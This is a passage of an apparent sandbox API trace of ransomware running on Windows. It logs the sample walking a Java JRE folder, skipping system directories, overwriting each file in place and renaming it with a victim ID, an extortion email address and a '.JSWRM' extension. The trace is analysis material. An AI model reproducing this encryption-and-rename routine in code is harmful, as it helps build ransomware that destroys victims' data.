lpNumberOfBytesWritten=0x345e898*=0xc90, lpOverlapped=0x0) returned 1 [0069.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.960] CloseHandle (hObject=0x458) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0069.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0069.960] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0069.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0069.960] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.960] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_it.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0069.961] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x18cd, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_ja.properties", cAlternateFileName="ME4AF1~1.PRO")) returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2=".") returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="..") returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="...") returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="windows") returned -1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="recovery") returned -1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="perflogs") returned -1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="documents and settings") returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="system volume information") returned -1 [0069.961] lstrcmpiW (lpString1="messages_ja.properties", lpString2="msocache") returned -1 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x241178, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ja.properties", lpUsedDefaultChar=0x0) returned 22 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ja.properties", cchWideChar=22, lpMultiByteStr=0x240ef8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ja.properties", lpUsedDefaultChar=0x0) returned 22 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.961] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.962] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.962] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6349) returned 1 [0069.962] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x18c0) returned 0x24e1e0 [0069.962] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x18c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x18c0, lpOverlapped=0x0) returned 1 [0069.964] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.964] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x18c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x18c0, lpOverlapped=0x0) returned 1 [0069.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.964] CloseHandle (hObject=0x458) returned 1 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0069.964] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0069.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.965] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ja.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0069.965] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1650, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_ko.properties", cAlternateFileName="ME1706~1.PRO")) returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2=".") returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="..") returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="...") returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="windows") returned -1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="recovery") returned -1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="perflogs") returned -1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="documents and settings") returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.965] lstrcmpiW (lpString1="messages_ko.properties", lpString2="system volume information") returned -1 [0069.966] lstrcmpiW (lpString1="messages_ko.properties", lpString2="msocache") returned -1 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x241308, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ko.properties", lpUsedDefaultChar=0x0) returned 22 [0069.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_ko.properties", cchWideChar=22, lpMultiByteStr=0x241010, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_ko.properties", lpUsedDefaultChar=0x0) returned 22 [0069.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.966] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.966] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.966] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5712) returned 1 [0069.966] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1650) returned 0x24e1e0 [0069.966] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x1650, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x1650, lpOverlapped=0x0) returned 1 [0069.968] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.968] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x1650, lpOverlapped=0x0) returned 1 [0069.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.968] CloseHandle (hObject=0x458) returned 1 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0069.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.968] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0069.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.969] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_ko.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0069.969] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.969] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xcd5, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="messages_pt_BR.properties", cAlternateFileName="MED1E1~1.PRO")) returned 1 [0069.969] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2=".") returned 1 [0069.969] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="..") returned 1 [0069.969] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="...") returned 1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="windows") returned -1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="recovery") returned -1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="perflogs") returned -1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="documents and settings") returned 1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="system volume information") returned -1 [0069.970] lstrcmpiW (lpString1="messages_pt_BR.properties", lpString2="msocache") returned -1 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x241060, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_pt_BR.properties", lpUsedDefaultChar=0x0) returned 25 [0069.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="messages_pt_BR.properties", cchWideChar=25, lpMultiByteStr=0x241010, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="messages_pt_BR.properties", lpUsedDefaultChar=0x0) returned 25 [0069.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0069.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.970] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.970] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages_pt_BR.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages_pt_br.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0069.971] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3285) returned 1 [0069.971] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xcd0) returned 0x24e1e0 [0069.971] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xcd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xcd0, lpOverlapped=0x0) returned 1 [0069.972] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.972] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xcd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xcd0, lpOverlapped=0x0) returned 1 [0069.973] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0069.973] CloseHandle (hObject=0x458) returned 1 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.973] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.973] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: 